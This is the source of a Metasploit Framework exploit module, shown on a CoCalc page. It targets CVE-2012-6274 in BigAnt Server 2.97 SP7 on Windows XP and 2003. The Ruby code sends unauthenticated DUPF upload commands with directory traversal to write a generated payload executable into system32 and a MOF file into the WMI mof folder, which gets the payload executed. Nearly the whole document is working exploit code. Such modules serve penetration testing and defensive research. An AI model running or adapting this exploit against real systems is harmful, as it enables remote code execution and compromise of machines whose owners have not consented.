Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bigant_server_dupf_upload.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::EXE

11
  include Msf::Exploit::WbemExec

12
  include Msf::Exploit::FileDropper

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'BigAnt Server DUPF Command Arbitrary File Upload',

19
        'Description' => %q{

20
          This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.

21
          A lack of authentication allows to make unauthenticated file uploads through a DUPF

22
          command. Additionally the filename option in the same command can be used to launch

23
          a directory traversal attack and achieve arbitrary file upload.

24


25
          The module uses the Windows Management Instrumentation service to execute an

26
          arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It

27
          has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003

28
          SP2.

29
        },

30
        'Author' => [

31
          'Hamburgers Maccoy', # Vulnerability discovery

32
          'juan vazquez' # Metasploit module

33
        ],

34
        'License' => MSF_LICENSE,

35
        'References' => [

36
          [ 'CVE', '2012-6274' ],

37
          [ 'US-CERT-VU', '990652' ],

38
          [ 'BID', '57214' ],

39
          [ 'OSVDB', '89342' ]

40
        ],

41
        'Privileged' => true,

42
        'Platform' => 'win',

43
        'Targets' => [

44
          [ 'BigAnt Server 2.97 SP7', {} ]

45
        ],

46
        'DefaultTarget' => 0,

47
        'DefaultOptions' => {

48
          'WfsDelay' => 10

49
        },

50
        'DisclosureDate' => '2013-01-09',

51
        'Notes' => {

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'Stability' => UNKNOWN_STABILITY,

54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

55
        }

56
      )

57
    )

58


59
    register_options(

60
      [

61
        Opt::RPORT(6661),

62
        OptInt.new('DEPTH', [true, "Levels to reach base directory", 6])

63
      ]

64
    )

65
  end

66


67
  def upload_file(filename, content)

68
    random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}"

69


70
    dupf = "DUPF 16\n"

71
    dupf << "cmdid: 1\n"

72
    dupf << "content-length: #{content.length}\n"

73
    dupf << "content-type: Appliction/Download\n"

74
    dupf << "filename: #{"\\.." * datastore['DEPTH']}\\#{filename}\n"

75
    dupf << "modified: #{random_date}\n"

76
    dupf << "pclassid: 102\n"

77
    dupf << "pobjid: 1\n"

78
    dupf << "rootid: 1\n"

79
    dupf << "sendcheck: 1\n\n"

80
    dupf << content

81


82
    print_status("sending DUPF")

83
    connect

84
    sock.put(dupf)

85
    res = sock.get_once

86
    disconnect

87
    return res

88
  end

89


90
  def exploit

91
    peer = "#{rhost}:#{rport}"

92


93
    # Setup the necessary files to do the wbemexec trick

94
    exe_name = rand_text_alpha(rand(10) + 5) + '.exe'

95
    exe = generate_payload_exe

96
    mof_name = rand_text_alpha(rand(10) + 5) + '.mof'

97
    mof = generate_mof(mof_name, exe_name)

98


99
    print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}")

100
    res = upload_file("WINDOWS\\system32\\#{exe_name}", exe)

101
    if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/

102
      print_good("#{exe_name} uploaded successfully")

103
    else

104
      if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/

105
        print_error("Upload failed, check the DEPTH option")

106
      end

107
      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}")

108
    end

109


110
    print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")

111
    res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)

112
    if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/

113
      print_good("#{mof_name} uploaded successfully")

114
      register_file_for_cleanup(exe_name)

115
      register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")

116
    else

117
      if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/

118
        print_error("Upload failed, check the DEPTH option")

119
      end

120
      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}")

121
    end

122
  end

123
end

124


125